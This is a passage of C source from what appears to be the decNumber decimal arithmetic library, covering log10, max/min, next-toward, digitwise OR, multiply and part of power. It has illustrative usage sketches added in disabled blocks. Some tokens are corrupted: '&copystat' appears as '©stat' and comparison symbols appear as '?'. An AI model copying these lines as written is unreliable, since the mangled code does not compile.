/* requested digits and t is the number of digits in the exponent */ /* (maximum 6). 
For ln(10) it is p + 3; this is often handled by the */ /* fastpath in decLnOp. The final division is done to the requested */ /* precision. */ /* ------------------------------------------------------------------ */ decNumber * decNumberLog10(decNumber *res, const decNumber *rhs, decContext *set) { uInt status=0, ignore=0; /* status accumulators */ uInt needbytes; /* for space calculations */ Int p; /* working precision */ Int t; /* digits in exponent of A */ /* buffers for a and b working decimals */ /* (adjustment calculator, same size) */ decNumber bufa[D2N(DECBUFFER+2)]; decNumber *allocbufa=NULL; /* -> allocated bufa, iff allocated */ decNumber *a=bufa; /* temporary a */ decNumber bufb[D2N(DECBUFFER+2)]; decNumber *allocbufb=NULL; /* -> allocated bufb, iff allocated */ decNumber *b=bufb; /* temporary b */ decNumber bufw[D2N(10)]; /* working 2-10 digit number */ decNumber *w=bufw; /* .. */ #if DECSUBSET decNumber *allocrhs=NULL; /* non-NULL if rounded rhs allocated */ #endif decContext aset; /* working context */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* Check restrictions; this is a math function; if not violated */ /* then carry out the operation. */ if (!decCheckMath(rhs, set, &status)) do { /* protect malloc */ #if DECSUBSET if (!set->extended) { /* reduce operand and set lostDigits status, as needed */ if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, &status); if (allocrhs==NULL) break; rhs=allocrhs; } /* special check in subset for rhs=0 */ if (ISZERO(rhs)) { /* +/- zeros -> error */ status|=DEC_Invalid_operation; break;} } /* extended=0 */ #endif decContextDefault(&aset, DEC_INIT_DECIMAL64); /* clean context */ /* handle exact powers of 10; only check if +ve finite */ if (!(rhs->bits&(DECNEG|DECSPECIAL)) && !ISZERO(rhs)) { Int residue=0; /* (no residue) */ uInt copystat=0; /* clean status */ /* round to a single digit... */ aset.digits=1; decCopyFit(w, rhs, &aset, &residue, ©stat); /* copy & shorten */ /* if exact and the digit is 1, rhs is a power of 10 */ if (!(copystat&DEC_Inexact) && w->lsu[0]==1) { /* the exponent, conveniently, is the power of 10; making */ /* this the result needs a little care as it might not fit, */ /* so first convert it into the working number, and then move */ /* to res */ decNumberFromInt32(w, w->exponent); residue=0; decCopyFit(res, w, set, &residue, &status); /* copy & round */ decFinish(res, set, &residue, &status); /* cleanup/set flags */ break; } /* not a power of 10 */ } /* not a candidate for exact */ /* simplify the information-content calculation to use 'total */ /* number of digits in a, including exponent' as compared to the */ /* requested digits, as increasing this will only rarely cost an */ /* iteration in ln(a) anyway */ t=6; /* it can never be >6 */ /* allocate space when needed... */ p=(rhs->digits+t>set->digits?rhs->digits+t:set->digits)+3; needbytes=sizeof(decNumber)+(D2U(p)-1)*sizeof(Unit); if (needbytes>sizeof(bufa)) { /* need malloc space */ allocbufa=(decNumber *)malloc(needbytes); if (allocbufa==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} a=allocbufa; /* use the allocated space */ } aset.digits=p; /* as calculated */ aset.emax=DEC_MAX_MATH; /* usual bounds */ aset.emin=-DEC_MAX_MATH; /* .. 
*/ aset.clamp=0; /* and no concrete format */ decLnOp(a, rhs, &aset, &status); /* a=ln(rhs) */ /* skip the division if the result so far is infinite, NaN, or */ /* zero, or there was an error; note NaN from sNaN needs copy */ if (status&DEC_NaNs && !(status&DEC_sNaN)) break; if (a->bits&DECSPECIAL || ISZERO(a)) { decNumberCopy(res, a); /* [will fit] */ break;} /* for ln(10) an extra 3 digits of precision are needed */ p=set->digits+3; needbytes=sizeof(decNumber)+(D2U(p)-1)*sizeof(Unit); if (needbytes>sizeof(bufb)) { /* need malloc space */ allocbufb=(decNumber *)malloc(needbytes); if (allocbufb==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} b=allocbufb; /* use the allocated space */ } decNumberZero(w); /* set up 10... */ #if DECDPUN==1 w->lsu[1]=1; w->lsu[0]=0; /* .. */ #else w->lsu[0]=10; /* .. */ #endif w->digits=2; /* .. */ aset.digits=p; decLnOp(b, w, &aset, &ignore); /* b=ln(10) */ aset.digits=set->digits; /* for final divide */ decDivideOp(res, a, b, &aset, DIVIDE, &status); /* into result */ } while(0); /* [for break] */ if (allocbufa!=NULL) free(allocbufa); /* drop any storage used */ if (allocbufb!=NULL) free(allocbufb); /* .. */ #if DECSUBSET if (allocrhs !=NULL) free(allocrhs); /* .. */ #endif /* apply significant status */ if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberLog10 */ /* ------------------------------------------------------------------ */ /* decNumberMax -- compare two Numbers and return the maximum */ /* */ /* This computes C = A ? B, returning the maximum by 754R rules */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberMax(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPMAX, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberMax */ /* ------------------------------------------------------------------ */ /* decNumberMaxMag -- compare and return the maximum by magnitude */ /* */ /* This computes C = A ? B, returning the maximum by 754R rules */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberMaxMag(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPMAXMAG, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberMaxMag */ /* ------------------------------------------------------------------ */ /* decNumberMin -- compare two Numbers and return the minimum */ /* */ /* This computes C = A ? B, returning the minimum by 754R rules */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. 
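*/

/* [Editor's sketch] Illustrative contrast of decNumberMax and          */
/* decNumberMaxMag above; a minimal example that is ours and is not     */
/* compiled into the library.  MaxMag compares by magnitude, so it can  */
/* pick the operand with the smaller value.                             */
#if 0
#define DECNUMDIGITS 34
#include "decNumber.h"
#include <stdio.h>
static void exampleMax(void) {
  decContext set;
  decNumber a, b, r;
  char out[DECNUMDIGITS+14];
  decContextDefault(&set, DEC_INIT_BASE);
  set.traps=0;
  decNumberFromString(&a, "3.2", &set);
  decNumberFromString(&b, "-7", &set);
  decNumberMax(&r, &a, &b, &set);     /* by value: expect 3.2 */
  printf("max(3.2, -7)    -> %s\n", decNumberToString(&r, out));
  decNumberMaxMag(&r, &a, &b, &set);  /* |-7| > |3.2|: expect -7 */
  printf("maxmag(3.2, -7) -> %s\n", decNumberToString(&r, out));
  }
#endif
/*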
*/ /* ------------------------------------------------------------------ */ decNumber * decNumberMin(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPMIN, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberMin */ /* ------------------------------------------------------------------ */ /* decNumberMinMag -- compare and return the minimum by magnitude */ /* */ /* This computes C = A ? B, returning the minimum by 754R rules */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberMinMag(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPMINMAG, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberMinMag */ /* ------------------------------------------------------------------ */ /* decNumberMinus -- prefix minus operator */ /* */ /* This computes C = 0 - A */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context */ /* */ /* See also decNumberCopyNegate for a quiet bitwise version of this. */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ /* Simply use AddOp for the subtract, which will do the necessary. */ /* ------------------------------------------------------------------ */ decNumber * decNumberMinus(decNumber *res, const decNumber *rhs, decContext *set) { decNumber dzero; uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif decNumberZero(&dzero); /* make 0 */ dzero.exponent=rhs->exponent; /* [no coefficient expansion] */ decAddOp(res, &dzero, rhs, set, DECNEG, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberMinus */ /* ------------------------------------------------------------------ */ /* decNumberNextMinus -- next towards -Infinity */ /* */ /* This computes C = A - infinitesimal, rounded towards -Infinity */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context */ /* */ /* This is a generalization of 754r NextDown. */ /* ------------------------------------------------------------------ */ decNumber * decNumberNextMinus(decNumber *res, const decNumber *rhs, decContext *set) { decNumber dtiny; /* constant */ decContext workset=*set; /* work */ uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* +Infinity is the special case */ if ((rhs->bits&(DECINF|DECNEG))==DECINF) { decSetMaxValue(res, set); /* is +ve */ /* there is no status to set */ return res; } decNumberZero(&dtiny); /* start with 0 */ dtiny.lsu[0]=1; /* make number that is .. */ dtiny.exponent=DEC_MIN_EMIN-1; /* .. 
smaller than tiniest */ workset.round=DEC_ROUND_FLOOR; decAddOp(res, rhs, &dtiny, &workset, DECNEG, &status); status&=DEC_Invalid_operation|DEC_sNaN; /* only sNaN Invalid please */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberNextMinus */ /* ------------------------------------------------------------------ */ /* decNumberNextPlus -- next towards +Infinity */ /* */ /* This computes C = A + infinitesimal, rounded towards +Infinity */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context */ /* */ /* This is a generalization of 754r NextUp. */ /* ------------------------------------------------------------------ */ decNumber * decNumberNextPlus(decNumber *res, const decNumber *rhs, decContext *set) { decNumber dtiny; /* constant */ decContext workset=*set; /* work */ uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* -Infinity is the special case */ if ((rhs->bits&(DECINF|DECNEG))==(DECINF|DECNEG)) { decSetMaxValue(res, set); res->bits=DECNEG; /* negative */ /* there is no status to set */ return res; } decNumberZero(&dtiny); /* start with 0 */ dtiny.lsu[0]=1; /* make number that is .. */ dtiny.exponent=DEC_MIN_EMIN-1; /* .. smaller than tiniest */ workset.round=DEC_ROUND_CEILING; decAddOp(res, rhs, &dtiny, &workset, 0, &status); status&=DEC_Invalid_operation|DEC_sNaN; /* only sNaN Invalid please */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberNextPlus */ /* ------------------------------------------------------------------ */ /* decNumberNextToward -- next towards rhs */ /* */ /* This computes C = A +/- infinitesimal, rounded towards */ /* +/-Infinity in the direction of B, as per 754r nextafter rules */ /* */ /* res is C, the result. C may be A or B. */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* This is a generalization of 754r NextAfter. */ /* ------------------------------------------------------------------ */ decNumber * decNumberNextToward(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { decNumber dtiny; /* constant */ decContext workset=*set; /* work */ Int result; /* .. */ uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif if (decNumberIsNaN(lhs) || decNumberIsNaN(rhs)) { decNaNs(res, lhs, rhs, set, &status); } else { /* Is numeric, so no chance of sNaN Invalid, etc. */ result=decCompare(lhs, rhs, 0); /* sign matters */ if (result==BADINT) status|=DEC_Insufficient_storage; /* rare */ else { /* valid compare */ if (result==0) decNumberCopySign(res, lhs, rhs); /* easy */ else { /* differ: need NextPlus or NextMinus */ uByte sub; /* add or subtract */ if (result<0) { /* lhs<rhs, do nextplus */ /* -Infinity is the special case */ if ((lhs->bits&(DECINF|DECNEG))==(DECINF|DECNEG)) { decSetMaxValue(res, set); res->bits=DECNEG; /* negative */ return res; /* there is no status to set */ } workset.round=DEC_ROUND_CEILING; sub=0; /* add, please */ } /* plus */ else { /* lhs>rhs, do nextminus */ /* +Infinity is the special case */ if ((lhs->bits&(DECINF|DECNEG))==DECINF) { decSetMaxValue(res, set); return res; /* there is no status to set */ } workset.round=DEC_ROUND_FLOOR; sub=DECNEG; /* subtract, please */ } /* minus */ decNumberZero(&dtiny); /* start with 0 */ dtiny.lsu[0]=1; /* make number that is .. */ dtiny.exponent=DEC_MIN_EMIN-1; /* .. 
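*/
/* [Editor's note] dtiny is 1E-1000000000 (DEC_MIN_EMIN is            */
/* -999999999), so its exponent lies below the emin of any permitted  */
/* context; the directed-rounding add below therefore steps lhs to    */
/* its neighbouring representable value                               */
/* ..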
smaller than tiniest */ decAddOp(res, lhs, &dtiny, &workset, sub, &status); /* + or - */ /* turn off exceptions if the result is a normal number */ /* (including Nmin), otherwise let all status through */ if (decNumberIsNormal(res, set)) status=0; } /* unequal */ } /* compare OK */ } /* numeric */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberNextToward */ /* ------------------------------------------------------------------ */ /* decNumberOr -- OR two Numbers, digitwise */ /* */ /* This computes C = A | B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X|X) */ /* lhs is A */ /* rhs is B */ /* set is the context (used for result length and error report) */ /* */ /* C must have space for set->digits digits. */ /* */ /* Logical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* ------------------------------------------------------------------ */ decNumber * decNumberOr(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { const Unit *ua, *ub; /* -> operands */ const Unit *msua, *msub; /* -> operand msus */ Unit *uc, *msuc; /* -> result and its msu */ Int msudigs; /* digits in res msu */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif if (lhs->exponent!=0 || decNumberIsSpecial(lhs) || decNumberIsNegative(lhs) || rhs->exponent!=0 || decNumberIsSpecial(rhs) || decNumberIsNegative(rhs)) { decStatus(res, DEC_Invalid_operation, set); return res; } /* operands are valid */ ua=lhs->lsu; /* bottom-up */ ub=rhs->lsu; /* .. */ uc=res->lsu; /* .. */ msua=ua+D2U(lhs->digits)-1; /* -> msu of lhs */ msub=ub+D2U(rhs->digits)-1; /* -> msu of rhs */ msuc=uc+D2U(set->digits)-1; /* -> msu of result */ msudigs=MSUDIGITS(set->digits); /* [faster than remainder] */ for (; uc<=msuc; ua++, ub++, uc++) { /* Unit loop */ Unit a, b; /* extract units */ if (ua>msua) a=0; else a=*ua; if (ub>msub) b=0; else b=*ub; *uc=0; /* can now write back */ if (a|b) { /* maybe 1 bits to examine */ Int i, j; /* This loop could be unrolled and/or use BIN2BCD tables */ for (i=0; i<DECDPUN; i++) { if ((a|b)&1) *uc=*uc+(Unit)powers[i]; /* effect OR */ j=a%10; a=a/10; j|=b%10; b=b/10; if (j>1) { decStatus(res, DEC_Invalid_operation, set); return res; } if (uc==msuc && i==msudigs-1) break; /* just did final digit */ } /* each digit */ } /* non-zero */ } /* each unit */ /* [here uc-1 is the msu of the result] */ res->digits=decGetDigits(res->lsu, uc-res->lsu); res->exponent=0; /* integer */ res->bits=0; /* sign=0 */ return res; /* [no status to set] */ } /* decNumberOr */ /* ------------------------------------------------------------------ */ /* decNumberPlus -- prefix plus operator */ /* */ /* This computes C = 0 + A */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context */ /* */ /* See also decNumberCopy for a quiet bitwise version of this. */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ /* This simply uses AddOp; Add will take fast path after preparing A. */ /* Performance is a concern here, as this routine is often used to */ /* check operands and apply rounding and overflow/underflow testing. 
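*/

/* [Editor's sketch] Illustrative use of decNumberOr above; a minimal   */
/* example that is ours and is not compiled.  Operands must be finite,  */
/* non-negative integers whose digits are all 0 or 1, as checked above. */
#if 0
#define DECNUMDIGITS 34
#include "decNumber.h"
#include <stdio.h>
static void exampleOr(void) {
  decContext set;
  decNumber a, b, r;
  char out[DECNUMDIGITS+14];
  decContextDefault(&set, DEC_INIT_BASE);
  set.traps=0;
  decNumberFromString(&a, "1100", &set);
  decNumberFromString(&b, "1010", &set);
  decNumberOr(&r, &a, &b, &set);      /* digitwise OR: expect 1110 */
  printf("or(1100, 1010) -> %s\n", decNumberToString(&r, out));
  decNumberFromString(&b, "12", &set);
  decNumberOr(&r, &a, &b, &set);      /* digit 2 is invalid: expect */
                                      /* NaN with Invalid_operation */
  printf("or(1100, 12)   -> %s\n", decNumberToString(&r, out));
  }
#endif
/*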
*/
/* ------------------------------------------------------------------ */
decNumber * decNumberPlus(decNumber *res, const decNumber *rhs,
                          decContext *set) {
  decNumber dzero;
  uInt status=0;                     /* accumulator */
#if DECCHECK
  if (decCheckOperands(res, DECUNUSED, rhs, set)) return res;
#endif
  decNumberZero(&dzero);             /* make 0 */
  dzero.exponent=rhs->exponent;      /* [no coefficient expansion] */
  decAddOp(res, &dzero, rhs, set, 0, &status);
  if (status!=0) decStatus(res, status, set);
#if DECCHECK
  decCheckInexact(res, set);
#endif
  return res;
  } /* decNumberPlus */

/* ------------------------------------------------------------------ */
/* decNumberMultiply -- multiply two Numbers                          */
/*                                                                    */
/* This computes C = A x B                                            */
/*                                                                    */
/* res is C, the result.  C may be A and/or B (e.g., X=X*X)           */
/* lhs is A                                                           */
/* rhs is B                                                           */
/* set is the context                                                 */
/*                                                                    */
/* C must have space for set->digits digits.                          */
/* ------------------------------------------------------------------ */
decNumber * decNumberMultiply(decNumber *res, const decNumber *lhs,
                              const decNumber *rhs, decContext *set) {
  uInt status=0;                     /* accumulator */
  decMultiplyOp(res, lhs, rhs, set, &status);
  if (status!=0) decStatus(res, status, set);
#if DECCHECK
  decCheckInexact(res, set);
#endif
  return res;
  } /* decNumberMultiply */

/* ------------------------------------------------------------------ */
/* decNumberPower -- raise a number to a power                        */
/*                                                                    */
/* This computes C = A ** B                                           */
/*                                                                    */
/* res is C, the result.  C may be A and/or B (e.g., X=X**X)          */
/* lhs is A                                                           */
/* rhs is B                                                           */
/* set is the context                                                 */
/*                                                                    */
/* C must have space for set->digits digits.                          */
/*                                                                    */
/* Mathematical function restrictions apply (see above); a NaN is     */
/* returned with Invalid_operation if a restriction is violated.      */
/*                                                                    */
/* However, if -1999999997<=B<=999999999 and B is an integer then the */
/* restrictions on A and the context are relaxed to the usual bounds, */
/* for compatibility with the earlier (integer power only) version    */
/* of this function.                                                  */
/*                                                                    */
/* When B is an integer, the result may be exact, even if rounded.    */
/*                                                                    */
/* The final result is rounded according to the context; it will      */
/* almost always be correctly rounded, but may be up to 1 ulp in      */
/* error in rare cases.                                               */
/* ------------------------------------------------------------------ */
decNumber * decNumberPower(decNumber *res, const decNumber *lhs,
                           const decNumber *rhs, decContext *set) {
#if DECSUBSET
  decNumber *alloclhs=NULL;          /* non-NULL if rounded lhs allocated */
  decNumber *allocrhs=NULL;          /* .., rhs */
#endif
  decNumber *allocdac=NULL;          /* -> allocated acc buffer, iff used */
  decNumber *allocinv=NULL;          /* -> allocated 1/x buffer, iff used */
  Int reqdigits=set->digits;         /* requested DIGITS */
  Int n;                             /* rhs in binary */
  Flag rhsint=0;                     /* 1 if rhs is an integer */
  Flag useint=0;                     /* 1 if can use integer calculation */
  Flag isoddint=0;                   /* 1 if rhs is an integer and odd */
  Int i;                             /* work */
#if DECSUBSET
  Int dropped;                       /* .. */
#endif
  uInt needbytes;                    /* buffer size needed */
  Flag seenbit;                      /* seen a bit while powering */
  Int residue=0;                     /* rounding residue */
  uInt status=0;                     /* accumulators */
  uByte bits=0;                      /* result sign if errors */
  decContext aset;                   /* working context */
  decNumber dnOne;                   /* work value 1...
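*/
/* [Editor's sketch] Illustrative use of decNumberMultiply above; a   */
/* minimal example that is ours, excluded from the surrounding        */
/* function by #if 0 and never compiled.                              */
#if 0
#define DECNUMDIGITS 34
#include "decNumber.h"
#include <stdio.h>
static void exampleMultiply(void) {
  decContext set;
  decNumber a, b, r;
  char out[DECNUMDIGITS+14];
  decContextDefault(&set, DEC_INIT_BASE);
  set.traps=0;
  decNumberFromString(&a, "2.50", &set);
  decNumberFromString(&b, "1.2", &set);
  decNumberMultiply(&r, &a, &b, &set); /* exact: expect 3.000 */
  printf("2.50 x 1.2 -> %s\n", decNumberToString(&r, out));
  }
#endif
/*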
*/ /* local accumulator buffer [a decNumber, with digits+elength+1 digits] */ decNumber dacbuff[D2N(DECBUFFER+9)]; decNumber *dac=dacbuff; /* -> result accumulator */ /* same again for possible 1/lhs calculation */ decNumber invbuff[D2N(DECBUFFER+9)]; #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operands and set status, as needed */ if (lhs->digits>reqdigits) { alloclhs=decRoundOperand(lhs, set, &status); if (alloclhs==NULL) break; lhs=alloclhs; } if (rhs->digits>reqdigits) { allocrhs=decRoundOperand(rhs, set, &status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ /* handle NaNs and rhs Infinity (lhs infinity is harder) */ if (SPECIALARGS) { if (decNumberIsNaN(lhs) || decNumberIsNaN(rhs)) { /* NaNs */ decNaNs(res, lhs, rhs, set, &status); break;} if (decNumberIsInfinite(rhs)) { /* rhs Infinity */ Flag rhsneg=rhs->bits&DECNEG; /* save rhs sign */ if (decNumberIsNegative(lhs) /* lhs<0 */ && !decNumberIsZero(lhs)) /* .. */ status|=DEC_Invalid_operation; else { /* lhs >=0 */ decNumberZero(&dnOne); /* set up 1 */ dnOne.lsu[0]=1; decNumberCompare(dac, lhs, &dnOne, set); /* lhs ? 1 */ decNumberZero(res); /* prepare for 0/1/Infinity */ if (decNumberIsNegative(dac)) { /* lhs<1 */ if (rhsneg) res->bits|=DECINF; /* +Infinity [else is +0] */ } else if (dac->lsu[0]==0) { /* lhs=1 */ /* 1**Infinity is inexact, so return fully-padded 1.0000 */ Int shift=set->digits-1; *res->lsu=1; /* was 0, make int 1 */ res->digits=decShiftToMost(res->lsu, 1, shift); res->exponent=-shift; /* make 1.0000... */ status|=DEC_Inexact|DEC_Rounded; /* deemed inexact */ } else { /* lhs>1 */ if (!rhsneg) res->bits|=DECINF; /* +Infinity [else is +0] */ } } /* lhs>=0 */ break;} /* [lhs infinity drops through] */ } /* specials */ /* Original rhs may be an integer that fits and is in range */ n=decGetInt(rhs); if (n!=BADINT) { /* it is an integer */ rhsint=1; /* record the fact for 1**n */ isoddint=(Flag)n&1; /* [works even if big] */ if (n!=BIGEVEN && n!=BIGODD) /* can use integer path? */ useint=1; /* looks good */ } if (decNumberIsNegative(lhs) /* -x .. */ && isoddint) bits=DECNEG; /* .. to an odd power */ /* handle LHS infinity */ if (decNumberIsInfinite(lhs)) { /* [NaNs already handled] */ uByte rbits=rhs->bits; /* save */ decNumberZero(res); /* prepare */ if (n==0) *res->lsu=1; /* [-]Inf**0 => 1 */ else { /* -Inf**nonint -> error */ if (!rhsint && decNumberIsNegative(lhs)) { status|=DEC_Invalid_operation; /* -Inf**nonint is error */ break;} if (!(rbits & DECNEG)) bits|=DECINF; /* was not a **-n */ /* [otherwise will be 0 or -0] */ res->bits=bits; } break;} /* similarly handle LHS zero */ if (decNumberIsZero(lhs)) { if (n==0) { /* 0**0 => Error */ #if DECSUBSET if (!set->extended) { /* [unless subset] */ decNumberZero(res); *res->lsu=1; /* return 1 */ break;} #endif status|=DEC_Invalid_operation; } else { /* 0**x */ uByte rbits=rhs->bits; /* save */ if (rbits & DECNEG) { /* was a 0**(-n) */ #if DECSUBSET if (!set->extended) { /* [bad if subset] */ status|=DEC_Invalid_operation; break;} #endif bits|=DECINF; } decNumberZero(res); /* prepare */ /* [otherwise will be 0 or -0] */ res->bits=bits; } break;} /* here both lhs and rhs are finite; rhs==0 is handled in the */ /* integer path. 
Next handle the non-integer cases */ if (!useint) { /* non-integral rhs */ /* any -ve lhs is bad, as is either operand or context out of */ /* bounds */ if (decNumberIsNegative(lhs)) { status|=DEC_Invalid_operation; break;} if (decCheckMath(lhs, set, &status) || decCheckMath(rhs, set, &status)) break; /* variable status */ decContextDefault(&aset, DEC_INIT_DECIMAL64); /* clean context */ aset.emax=DEC_MAX_MATH; /* usual bounds */ aset.emin=-DEC_MAX_MATH; /* .. */ aset.clamp=0; /* and no concrete format */ /* calculate the result using exp(ln(lhs)*rhs), which can */ /* all be done into the accumulator, dac. The precision needed */ /* is enough to contain the full information in the lhs (which */ /* is the total digits, including exponent), or the requested */ /* precision, if larger, + 4; 6 is used for the exponent */ /* maximum length, and this is also used when it is shorter */ /* than the requested digits as it greatly reduces the >0.5 ulp */ /* cases at little cost (because Ln doubles digits each */ /* iteration so a few extra digits rarely causes an extra */ /* iteration) */ aset.digits=MAXI(lhs->digits, set->digits)+6+4; } /* non-integer rhs */ else { /* rhs is in-range integer */ if (n==0) { /* x**0 = 1 */ /* (0**0 was handled above) */ decNumberZero(res); /* result=1 */ *res->lsu=1; /* .. */ break;} /* rhs is a non-zero integer */ if (n<0) n=-n; /* use abs(n) */ aset=*set; /* clone the context */ aset.round=DEC_ROUND_HALF_EVEN; /* internally use balanced */ /* calculate the working DIGITS */ aset.digits=reqdigits+(rhs->digits+rhs->exponent)+2; #if DECSUBSET if (!set->extended) aset.digits--; /* use classic precision */ #endif /* it's an error if this is more than can be handled */ if (aset.digits>DECNUMMAXP) {status|=DEC_Invalid_operation; break;} } /* integer path */ /* aset.digits is the count of digits for the accumulator needed */ /* if accumulator is too long for local storage, then allocate */ needbytes=sizeof(decNumber)+(D2U(aset.digits)-1)*sizeof(Unit); /* [needbytes also used below if 1/lhs needed] */ if (needbytes>sizeof(dacbuff)) { allocdac=(decNumber *)malloc(needbytes); if (allocdac==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} dac=allocdac; /* use the allocated space */ } /* here, aset is set up and accumulator is ready for use */ if (!useint) { /* non-integral rhs */ /* x ** y; special-case x=1 here as it will otherwise always */ /* reduce to integer 1; decLnOp has a fastpath which detects */ /* the case of x=1 */ decLnOp(dac, lhs, &aset, &status); /* dac=ln(lhs) */ /* [no error possible, as lhs 0 already handled] */ if (ISZERO(dac)) { /* x==1, 1.0, etc. */ /* need to return fully-padded 1.0000 etc., but rhsint->1 */ *dac->lsu=1; /* was 0, make int 1 */ if (!rhsint) { /* add padding */ Int shift=set->digits-1; dac->digits=decShiftToMost(dac->lsu, 1, shift); dac->exponent=-shift; /* make 1.0000... */ status|=DEC_Inexact|DEC_Rounded; /* deemed inexact */ } } else { decMultiplyOp(dac, dac, rhs, &aset, &status); /* dac=dac*rhs */ decExpOp(dac, dac, &aset, &status); /* dac=exp(dac) */ } /* and drop through for final rounding */ } /* non-integer rhs */ else { /* carry on with integer */ decNumberZero(dac); /* acc=1 */ *dac->lsu=1; /* .. 
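*/
/* [Editor's note] The loop below is binary (square-and-multiply)    */
/* exponentiation; e.g. for n=5 (binary 101) it sets dac=x, squares  */
/* to x**2, squares again to x**4, then multiplies by x to give x**5 */
/* ..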
*/ /* if a negative power the constant 1 is needed, and if not subset */ /* invert the lhs now rather than inverting the result later */ if (decNumberIsNegative(rhs)) { /* was a **-n [hence digits>0] */ decNumber *inv=invbuff; /* assume use fixed buffer */ decNumberCopy(&dnOne, dac); /* dnOne=1; [needed now or later] */ #if DECSUBSET if (set->extended) { /* need to calculate 1/lhs */ #endif /* divide lhs into 1, putting result in dac [dac=1/dac] */ decDivideOp(dac, &dnOne, lhs, &aset, DIVIDE, &status); /* now locate or allocate space for the inverted lhs */ if (needbytes>sizeof(invbuff)) { allocinv=(decNumber *)malloc(needbytes); if (allocinv==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} inv=allocinv; /* use the allocated space */ } /* [inv now points to big-enough buffer or allocated storage] */ decNumberCopy(inv, dac); /* copy the 1/lhs */ decNumberCopy(dac, &dnOne); /* restore acc=1 */ lhs=inv; /* .. and go forward with new lhs */ #if DECSUBSET } #endif } /* Raise-to-the-power loop... */ seenbit=0; /* set once a 1-bit is encountered */ for (i=1;;i++){ /* for each bit [top bit ignored] */ /* abandon if had overflow or terminal underflow */ if (status & (DEC_Overflow|DEC_Underflow)) { /* interesting? */ if (status&DEC_Overflow || ISZERO(dac)) break; } /* [the following two lines revealed an optimizer bug in a C++ */ /* compiler, with symptom: 5**3 -> 25, when n=n+n was used] */ n=n<<1; /* move next bit to testable position */ if (n<0) { /* top bit is set */ seenbit=1; /* OK, significant bit seen */ decMultiplyOp(dac, dac, lhs, &aset, &status); /* dac=dac*x */ } if (i==31) break; /* that was the last bit */ if (!seenbit) continue; /* no need to square 1 */ decMultiplyOp(dac, dac, dac, &aset, &status); /* dac=dac*dac [square] */ } /*i*/ /* 32 bits */ /* complete internal overflow or underflow processing */ if (status & (DEC_Overflow|DEC_Underflow)) { #if DECSUBSET /* If subset, and power was negative, reverse the kind of -erflow */ /* [1/x not yet done] */ if (!set->extended && decNumberIsNegative(rhs)) { if (status & DEC_Overflow) status^=DEC_Overflow | DEC_Underflow | DEC_Subnormal; else { /* trickier -- Underflow may or may not be set */ status&=~(DEC_Underflow | DEC_Subnormal); /* [one or both] */ status|=DEC_Overflow; } } #endif dac->bits=(dac->bits & ~DECNEG) | bits; /* force correct sign */ /* round subnormals [to set.digits rather than aset.digits] */ /* or set overflow result similarly as required */ decFinalize(dac, set, &residue, &status); decNumberCopy(res, dac); /* copy to result (is now OK length) */ break; } #if 